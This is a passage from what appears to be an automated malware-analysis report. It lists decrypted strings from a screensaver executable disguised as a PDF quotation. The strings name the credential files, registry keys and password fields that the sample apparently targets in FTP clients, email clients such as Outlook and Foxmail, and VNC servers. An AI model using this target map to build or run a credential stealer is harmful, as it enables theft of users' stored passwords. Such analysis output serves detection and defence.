                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: WinSCP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ABCDEF
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Flash FXP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: port
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: user
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pass
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: quick.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Sites.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FlashFXP\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FlashFXP\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FTP Navigator
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: No Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: User
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmartFTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: WS_FTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HOST
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PWD=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PWD=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FtpCommander
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \cftp\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Password=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;User=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Server=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Port=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Port=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Password=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;User=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ;Anonymous=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FTPGetter
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FTPGetter\servers.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_ip>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_ip>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_ip>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_name>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_name>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_user_name>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_password>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <server_user_password>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </server_user_password>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FTPGetter
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: The Bat!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \The Bat!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Account.CFN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Account.CFN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Becky!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: DataDir
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Folder.lst
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Mailbox.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PassWd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTPServer
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: MailAddress
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Becky!
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Outlook
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IMAP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POP3 Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HTTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: IMAP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: POP3 Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HTTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SMTP Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Windows Mail App
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SchemaId
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pResourceElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pIdentityElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pPackageSid
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: pAuthenticatorElement
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: syncpassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: mailoutgoing
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FoxMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Executable
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FoxmailPath
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Storage\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Storage\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \VirtualStore\Program Files\Foxmail\mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \Accounts\Account.rec0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \Account.stg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: POP3Host
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SMTPHost
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: IncomingServer
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: MailAddress
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: POP3Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Opera Mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \Opera Mail\Opera Mail\wand.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: opera:
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: PocoMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: appdata
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \Pocomail\accounts.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: POPPass
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SMTPPass
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SMTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: eM Client
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: eM Client\accounts.dat
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: eM Client
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: "Username":"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: "Secret":"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: "ProviderName":"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: o6806642kbM7c5
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Mailbird
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SenderIdentities
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \Mailbird\Store\Store.db
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Server_Host
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Email
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Username
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: EncryptedPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Mailbird
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: RealVNC 4.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: RealVNC 3.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SOFTWARE\RealVNC\vncserver
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: RealVNC 4.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: SOFTWARE\RealVNC\WinVNC4
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: RealVNC 3.x
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Software\ORL\WinVNC3
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: TightVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Software\TightVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: TightVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Software\TightVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: PasswordViewOnly
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: TightVNC ControlPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Software\TightVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ControlPassword
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: TigerVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Software\TigerVNC\Server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd2
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: passwd
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: UltraVNC
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack String decryptor: ProgramFiles
